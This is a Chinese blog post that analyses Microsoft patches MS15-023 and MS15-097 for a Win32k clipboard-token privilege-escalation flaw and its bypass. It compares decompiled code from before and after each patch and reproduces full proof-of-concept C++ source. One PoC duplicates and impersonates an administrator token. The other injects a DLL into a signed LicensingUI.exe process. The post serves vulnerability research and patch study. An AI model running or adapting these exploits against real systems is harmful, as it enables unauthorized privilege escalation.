【微软漏洞分析】MS15-023 Win32k 特权提升漏洞 - CVE-2015-0078 + 绕过(CVE-2015-2527 in MS15-097)

最新推荐文章于 2024-11-04 12:22:27 发布
最新推荐文章于 2024-11-04 12:22:27 发布
阅读量689 收藏
点赞数 1
分类专栏: 微软漏洞分析 文章标签: microsoft 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/127766836
版权

目录

MS15-023

CVE-2015-0078 微软漏洞描述

Windows 内核模式驱动程序中存在一个特权提升漏洞,该漏洞是由于内核模式驱动程序未能正确验证调用线程的令牌而导致的。

成功利用此漏洞的经过身份验证的攻击者可以获得管理员凭据并使用它们来提升权限。然后攻击者可以安装程序;查看、更改或删除数据;或创建具有完全管理权限的新帐户。要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行旨在提高权限的特制应用程序。此更新通过更正内核模式驱动程序验证调用线程令牌的方式来解决漏洞。

漏洞作者分析

NtUserGetClipboardAccessToken win32k 系统调用将最后一个用户的访问令牌公开给低权限用户。它还可用于打开通常 OpenThreadToken 不应该做的匿名模拟线程令牌。
NtUserGetClipboardAccessToken 方法打开一个令牌对象,该对象在 NtUserCloseClipboard 系统调用期间捕获,假设调用者已将某些内容写入剪贴板。

补丁分析

我们这里以windows 7的x86的补丁分析,补丁解开之后的目录列表如下:

  • ms15-023\x86\win32k_6.3.9600.17694
    • win32k.sys

win32k.sys

主要包括一个更新函数:

  1. NtUserGetClipboardAccessToken

NtUserGetClipboardAccessToken

更新前

BOOL __stdcall NtUserGetClipboardAccessToken(int a1, ACCESS_MASK DesiredAccess)
{
  int v2; // edx
  BOOL v3; // ebx
  void *v4; // ecx
  void **v5; // ecx
  void *Handle; // [esp+18h] [ebp-1Ch] BYREF
  CPPEH_RECORD ms_exc; // [esp+1Ch] [ebp-18h]
  Handle = 0;
  EnterCrit(1);
  if ( sub_BF190(
         *(_DWORD *)(*(_DWORD *)(gptiCurrent + 200) + 456),
         *(_DWORD *)(*(_DWORD *)(gptiCurrent + 200) + 460),
         0x2000,
         -1)
    && (v4 = *(void **)(*(_DWORD *)(*(_DWORD *)(*(_DWORD *)v2 + 216) + 12) + 68)) != 0 )
  {
    v3 = ObOpenObjectByPointer(v4, 0, 0, DesiredAccess, (POBJECT_TYPE)SeTokenObjectType, 1, &Handle) >= 0;
    ms_exc.registration.TryLevel = 0;
    v5 = (void **)a1;
    if ( (unsigned int)a1 >= W32UserProbeAddress )
      v5 = (void **)W32UserProbeAddress;
    *v5 = Handle;
    ms_exc.registration.TryLevel = -2;
  }
  else
  {
    v3 = 0;
    sub_66C6A(5);
  }
  UserSessionSwitchLeaveCrit();
  return v3;
}

更新后

BOOL __stdcall NtUserGetClipboardAccessToken(int a1, ACCESS_MASK DesiredAccess)
{
  int v2; // eax
  BOOL v3; // ebx
  void *v4; // ecx
  void **v5; // ecx
  void *Handle; // [esp+18h] [ebp-1Ch] BYREF
  CPPEH_RECORD ms_exc; // [esp+1Ch] [ebp-18h]
  Handle = 0;
  EnterCrit();
  v2 = PsGetCurrentProcessWin32Process();
  if ( (IsImmersiveBroker(v2)
     || CheckAccessForIntegrityLevel(
          *(_DWORD *)(*(_DWORD *)(gptiCurrent + 200) + 456),
          *(_DWORD *)(*(_DWORD *)(gptiCurrent + 200) + 460),
          0x2000,
          -1))
    && (v4 = *(void **)(*(_DWORD *)(*(_DWORD *)(gptiCurrent + 216) + 12) + 68)) != 0 )
  {
    v3 = ObOpenObjectByPointer(v4, 0, 0, DesiredAccess, (POBJECT_TYPE)SeTokenObjectType, 1, &Handle) >= 0;
    ms_exc.registration.TryLevel = 0;
    v5 = (void **)a1;
    if ( (unsigned int)a1 >= W32UserProbeAddress )
      v5 = (void **)W32UserProbeAddress;
    *v5 = Handle;
    ms_exc.registration.TryLevel = -2;
  }
  else
  {
    v3 = 0;
    sub_511AC(5);
  }
  UserSessionSwitchLeaveCrit();
  return v3;
}

重点分析

增加了两个校验函数IsImmersiveBroker和CheckAccessForIntegrityLevel,只要符合其中之一就可以通过。

PoC分析

执行过程为:

  1. 获取GetClipboardAccessToken的dll调用地址
  2. GetProcessToken获取当前进程句柄
  3. GetTokenIntegrityLevel获取当前进程完整性级别(IL)
  4. GetAdminSid获取管理员SID
  5. 调用GetClipboardAccessToken获取令牌Token
  6. DuplicateTokenEx复制模拟令牌Token
  7. CheckTokenMembership检查令牌是否管理员
  8. SetTokenIL设置令牌的IL为当前进程IL
  9. ImpersonateLoggedOnUser用复制的令牌进行模拟登录
  10. CreateFile在系统目录创建文件

可以看到通过PoC的执行,可以验证复制出来的令牌已经具有管理员权限。

具体代码参考下面:

int _tmain(int argc, _TCHAR* argv[])
{
	_GetClipboardAccessToken f_GetClipboardAccessToken = (_GetClipboardAccessToken)GetProcAddress(LoadLibrary(L"user32.dll"), "GetClipboardAccessToken");	
	HANDLE hProcess = GetProcessToken();
	DWORD curr_il = GetTokenIntegrityLevel(hProcess);
	
	if (f_GetClipboardAccessToken)
	{
		typed_buffer_ptr<SID> adminSid;
		
		if (!GetAdminSid(adminSid))
		{
			printf("Error getting admin sid\n");
		}

		printf("Perform a copy in an elevated process window\n");

		while (true)
		{
			HANDLE hToken;

			if (f_GetClipboardAccessToken(&hToken, MAXIMUM_ALLOWED))
			{			
				HANDLE hImpToken;
					
				if (DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation, TokenImpersonation, &hImpToken))
				{										
					BOOL isMember;
					if (CheckTokenMembership(hImpToken, adminSid, &isMember) && isMember)
					{
						if (SetTokenIL(hImpToken, curr_il))
						{
							if (ImpersonateLoggedOnUser(hImpToken))
							{
								HANDLE hFile = CreateFile(L"c:\\windows\\test.txt", GENERIC_READ | GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, 0, 0);
								if (hFile != INVALID_HANDLE_VALUE)
								{
									printf("Opened file: %p\n", hFile);
									CloseHandle(hFile);
									break;
								}
								else
								{
									printf("Error: %d\n", GetLastError());
								}
							}
							else
							{
								printf("Error impersonating %d\n", GetLastError());
							}
						}
						else
						{
							printf("Error setting IL\n");
						}						
					}

					CloseHandle(hImpToken);
				}
				else
				{
					printf("Error duplicating: %d\n", GetLastError());
				}				

				CloseHandle(hToken);
			}			
			
			Sleep(1000);
		}
	}
	else
	{
		printf("GetClipboardAccessToken doesn't exist, not Windows 8.1?\n");
	}

	return 0;
}

MS15-097

CVE-2015-2527 微软漏洞描述

当 Windows 内核模式驱动程序 (Win32k.sys) 在某些进程初始化场景中无法正确验证和强制执行完整性级别时,存在特权提升漏洞。成功利用该漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。

要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行特制的应用程序,该应用程序可以利用该漏洞并控制受影响的系统。

漏洞作者分析

据说这在 MS15-023 中被修复为 CVE-2015-0078,以防止运行在中等 IL 以下的任何进程访问令牌。检查大致是:

if(IsImmersiveBroker() || CheckAccessForIntegrityLevelEx(0x2000)) {
ObOpenObjectByPointer(WinStationObject->ClipboardAccessToken, Access, TokenHandle);
}

这是可以绕过的,因为 IsImmersiveBroker 级别很容易获得。似乎 Win32k 在首次初始化进程并将其转换为 GUI 线程时设置了适当的 Win32Process 标志。如果可执行文件由 Microsoft 证书签名并且有一个特别命名的“.imrsiv”部分,则将设置该标志,但是无论进程的 IL 是什么,都会执行此操作。因此,您可以使用预签名的可执行文件之一创建进程,例如 explorer.exe、RuntimeBroker.exe 或 LicensingUI.exe,然后将 DLL 注入进程。这允许您绕过检查并捕获令牌。

补丁分析

更新函数和之前一致,更新后代码如下:

BOOL __stdcall NtUserGetClipboardAccessToken(int a1, ACCESS_MASK DesiredAccess)
{
  BOOL v2; // ebx
  void *v3; // ecx
  HDC v4; // ecx
  void *Handle; // [esp+10h] [ebp-20h] BYREF
  char v7; // [esp+17h] [ebp-19h] BYREF
  CPPEH_RECORD ms_exc; // [esp+18h] [ebp-18h]

  Handle = 0;
  EnterLeaveCrit::EnterLeaveCrit((EnterLeaveCrit *)&v7);
  
  
  if ( CheckAccessForIntegrityLevel(
         *(_DWORD *)(*(_DWORD *)(gptiCurrent + 196) + 456),
         *(_DWORD *)(*(_DWORD *)(gptiCurrent + 196) + 460),
         0x2000,
         -1)
    && (v3 = *(void **)(*(_DWORD *)(*(_DWORD *)(gptiCurrent + 212) + 12) + 68)) != 0 )
  {
    v2 = ObOpenObjectByPointer(v3, 0, 0, DesiredAccess, (POBJECT_TYPE)SeTokenObjectType, 1, &Handle) >= 0;
    ms_exc.registration.TryLevel = 0;
    v4 = (HDC)a1;
    if ( a1 >= (unsigned int)W32UserProbeAddress )
      v4 = W32UserProbeAddress;
    *(_DWORD *)v4 = Handle;
    ms_exc.registration.TryLevel = -2;
  }
  else
  {
    v2 = 0;
    UserSetLastError(5);
  }
  UserSessionSwitchLeaveCrit();
  return v2;
}

可以注意到只是删除了校验函数IsImmersiveBroker的调用,将之前的两种条件改为一种。

我们看下校验函数IsImmersiveBroker的代码:

BOOL __usercall IsImmersiveBroker@<eax>(int a1@<ecx>, struct _EPROCESS *a2@<esi>)
{
  PRKPROCESS v2; // esi
  BOOL result; // eax

  if ( gfIgnoreMoshHardening )
    return (*(_BYTE *)(a1 + 424) & 0x30) != 16;
  if ( (*(_DWORD *)(a1 + 424) & 0x30) == 32 )
    return 1;
  v2 = *(PRKPROCESS *)a1;
  if ( _IsProcessDwm(a2) )
    result = 1;
  else
    result = v2 == gpepCSRSS;
  return result;
}

这个函数主要的校验是Microsoft 证书签名和判断是否是dwm.exe和csrss.exe。

PoC分析

主函数的作用是创建LicensingUI.exe进程,并将Dll inject到LicensingUI.exe进程。

int _tmain(int argc, _TCHAR* argv[])
{	
	HANDLE hToken;
	OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);

	if (GetTokenIntegrityLevel(hToken) >= SECURITY_MANDATORY_MEDIUM_RID)
	{
		printf("ERROR: You should run this as low integrity to demonstrate the issue\n");
		return 1;
	}

	std::wstring path = GetExecutableDir();
	path += L"\\injected.dll";

	STARTUPINFO startInfo = { 0 };
	PROCESS_INFORMATION procInfo = { 0 };
	WCHAR cmdline[] = L"LicensingUI.exe";

	startInfo.cb = sizeof(startInfo);

	if (CreateProcess(nullptr, cmdline, nullptr, nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr, &startInfo, &procInfo))
	{
		InjectDll(procInfo.hProcess, procInfo.hThread, path);		
		ResumeThread(procInfo.hThread);				
	}	
	else
	{
		printf("Error creating process %d\n", GetLastError());
	}

	return 0;
}

继续看inject Dll的代码,执行过程为:

  1. 获取GetClipboardAccessToken的dll调用地址
  2. GetAdminSid获取管理员SID
  3. 调用GetClipboardAccessToken获取令牌Token
  4. GetTokenIntegrityLevel查询令牌的完整性级别
DWORD CALLBACK DoExploit(LPVOID arg)
{
	_GetClipboardAccessToken f_GetClipboardAccessToken = (_GetClipboardAccessToken)GetProcAddress(LoadLibrary(L"user32.dll"), "GetClipboardAccessToken");
	
	if (f_GetClipboardAccessToken)
	{
		typed_buffer_ptr<SID> adminSid;

		if (!GetAdminSid(adminSid))
		{
			DebugPrintf("Error getting admin sid\n");
		}

		DebugPrintf("Perform a copy in an elevated process window\n");

		while (true)
		{
			HANDLE hToken;

			if (f_GetClipboardAccessToken(&hToken, MAXIMUM_ALLOWED))
			{		
				DWORD il = GetTokenIntegrityLevel(hToken);
				if (il >= SECURITY_MANDATORY_MEDIUM_RID)
				{
					DebugPrintf("Captured token %p with IL of %08X\n", hToken, il);
					MessageBox(nullptr, L"Captured a User Token", L"Message", MB_ICONEXCLAMATION);
					break;
				}									
			
				CloseHandle(hToken);
			}

			Sleep(1000);
		}
	}
	else
	{
		DebugPrintf("GetClipboardAccessToken doesn't exist, not Windows 8.1?\n");
	}	

	//FreeLibraryAndExitThread((HMODULE)arg, 0);
	ExitProcess(1);
}



BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	DebugPrintf("In DllMain\n");
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		CreateThread(nullptr, 0, DoExploit, hModule, 0, 0);
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

参考

https://bugs.chromium.org/p/project-zero/issues/detail?id=219
https://bugs.chromium.org/p/project-zero/issues/detail?id=461
https://learn.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-023
https://learn.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-097

3riC5r
关注
专栏目录
微软漏洞分析MS15-010 CNG 安全功能绕过漏洞 - CVE-2015-0010
重新启程
11-04 710
微软漏洞分析序列,通过补丁分析找出问题点,这个漏洞是一个漏洞攻击面的第一篇文章。
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635、MS15-034
热门推荐
7Riven's blog
12-07 2万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
微软Win32K权限提升漏洞修复处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
03-08 1299
大多数情况下,x64 和 x86-64 处理器的性能没有显着差异。x64 和 x86-64 是同一种 64 位计算机架构,没有实际区别,主要取决于处理器制造商。x64 和 x86-64 都支持 64 位寻址,这意味着它们可以访问比 32 位架构更多的内存(高达 2^64 字节)。x64 和 x86-64 都向后兼容 32 位应用程序,这意味着它们可以在 64 位系统上运行 32 位软件。x86-64 是英特尔对 x64 架构的名称,用于其酷睿 2 处理器。它们都是 64 位计算机架构的两种名称。
CVE-2022-21882 Win32k内核提权漏洞深入分析
m0_71745258的博客
01-29 344
CVE-2022-21882是对CVE-2021-1732漏洞绕过,属于win32k驱动程序中的一个类型混淆漏洞。攻击者可以在user_mode调用相关的GUIAPI进行内核调用,如xxxMenuWindowProc、xxxSBWndProc、xxxSwitchWndProc、xxxTooltipWndProc等,这些内核函数会触发回调xxxClientAllocWindowClassExtraBytes。攻击者可以通过hook。
[CVE-2021-1732] win32k内核提权漏洞分析
further_eye的博客
04-23 1115
CVE-2021-1732是今年二月份被披露的蔓灵花(BITTER)APT组织在某次攻击行动中使用的0Day漏洞【1】【2】【3】。该漏洞利用Windows操作系统win32k内核模块一处用户态回调机会,破坏函数正常执行流程,造成窗口对象扩展数据的属性设置错误,最终导致内核空间的内存越界读写。当受影响版本的Windows操作系统用户执行攻击者构造的利用样本时,将会触发该漏洞,造成本地权限提升【4】。 1. 漏洞原理分析 CVE-2021-1732漏洞形成的根本原因是: Windows窗口创建(C.
漏洞复习】永恒之黑
syhsa的博客
04-18 1694
总的来说,“永恒之黑”漏洞揭示了网络安全中的一个重要问题,即即使是由政府部门开发的漏洞工具,一旦泄露,也可能被黑客和恶意分子利用,对网络安全构成严重威胁。“永恒之黑”漏洞利用了微软Windows操作系统中的漏洞,主要是针对 SMB(Server Message Block)协议的漏洞。通过利用这些漏洞,攻击者可以远程执行代码,而无需用户交互,从而控制受感染的计算机。微软在意识到漏洞的严重性后,发布了紧急补丁来修复这些漏洞,建议用户尽快更新其Windows操作系统,以防止受到攻击的风险。
windows【提权系列】— CVE-2016-7255(1)
2301_82243828的博客
05-17 993
攻击者利用该漏洞,可在未授权的情况下实现以本地系统账户权限执行任意代码。目前,厂商针对该漏洞已发布安全补丁。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows 内核模式驱动程序处理内存中对象的方式来解决这些漏洞。官方补丁地址为:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7255。
MS15-034漏洞检测工具-PY脚本
04-18
IIS高风险漏洞MS15-034的POC,可利用脚本检测漏洞是否存在。
CVE-2015-1635、MS15-034(Http.sys的利用工具)
11-10
利用 Http.sys 驱动对urlacl进行操作,由于Http.sys是IIS服务器的基础,其优先级高于IIS,不会造成端口bind冲突,达到端口服用效果,由于与受害机对外服务端口相同,可做到极高的隐蔽性。由于其生效后效果很类似于...
HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635) 漏洞修复
08-21
Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
Microsoft Windows Win32k本地提权漏洞分析
further_eye的博客
11-27 883
MicrosoftWindows内核模式驱动程序中存在特权提升漏洞,该漏洞源于程序没有正确地处理内存中的对象。本地攻击者可利用该漏洞在内核模式下运行任意代码。
Windows内核溢出漏洞提权
谢公子的博客
02-12 7006
目录 内核溢出漏洞提权 实战MSF中CVE-2018-8120模块本地溢出漏洞提权 查看系统补丁 选择利用模块攻击 内核溢出漏洞提权 本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。 github上windows系统溢出漏洞提权的汇总...
EXP查询合集提权后渗透必备-------后渗透提权常用漏洞
L_lemo004的博客
10-20 705
后渗透提权常用漏洞 CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019) CVE-2018-8639 [An elevation of privilege vulnerability exists in
KB编号、MS编号、CVE编号的区别
weixin_63137680的博客
10-27 2389
KB编号、MS编号、CVE编号的含义
第16课 核心函数(方法)
小怪兽的博客
11-01 971
掌握常用的内置函数及其用法。数学类函数:abs、divmod、max、min、pow、round、sum。类型转换函数:bool、int、float、str、ord、chr、bin、hex、tuple、list、dict、set、enumerate、range、object。序列操作函数:all、any、filter、map、next、sorted。对象操作函数:help、dir、type、ascii、format、vars。交互操作函数:input、print。文件操作函数:open。
ICT网络赛道安全考点知识总结4
最新发布
m0_72765822的博客
11-04 550
RADIUS和HWTACACS协议通常都使用共享密钥对传输的用户信息进行加密,以确保安全传输。 用来封装EAP报文的RADIUS属性通常是"EAP-Message",它用于传输EAP认证过程中的消息。 LDAP的域名属性通常是"DC"(Domain Component),用于表示域名的组成部分。 BFD(Bidirectional Forwarding Detection)可以用于检测网络设备之间直连物理链路的双向转发路径的故障,但也可以用于检测其他类型的链路故障。 管理员为虚拟系统手工分配资源时,
挂钩图像分割安全状态与危险状态识别系统:更新创新流程
lzmlzm89的博客
11-02 891
数据集信息展示在本研究中,我们使用了名为“test1”的数据集,以支持改进YOLOv8-seg的挂钩图像分割安全状态与危险状态识别系统的训练与验证。该数据集专门设计用于处理与安全相关的图像分类任务,旨在提高系统对不同安全状态的识别能力,从而为实际应用提供更为精准的安全监测解决方案。“test1”数据集包含三种主要类别,分别为“安全状态”、“危险状态_1”和“危险状态_2”。这些类别的选择反映了在实际应用中可能遇到的多样化安全场景,能够有效地模拟和识别不同的安全与危险状态。
【论文速读】| APILOT:通过避开过时API陷阱,引导大语言模型生成安全代码
m0_73736695的博客
11-01 1152
论文提出了一种名为APILOT的系统,它通过实时更新过时API的数据集,并结合增强生成方法,引导LLMs生成版本感知的安全代码。
如何在Linux系统中使用SSH进行安全连接
qq_36287830的博客
10-30 528
SSH是一个网络协议,用于计算机之间的安全登录以及命令执行,此外还允许进行安全的数据传输。通过本文,你已经学习了如何在Linux系统中使用SSH进行安全连接。我们介绍了SSH的基本概念、安装方法、启动SSH服务、验证安装、SSH配置、SSH客户端、SSH密钥认证、使用SSH隧道、SSH端口转发、使用SSH代理、SSH环境变量、SSH日志、SSH守护进程选项、使用SSH密钥管理工具、使用SSH证书、使用SSH网关、SSH的高级特性等内容。
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)【原理扫描】
05-24
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)是一种存在于HTTP协议栈中的安全漏洞,可以导致远程攻击者在未经身份验证的情况下以SYSTEM权限执行任意代码。攻击者可以通过发送特制的HTTP...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值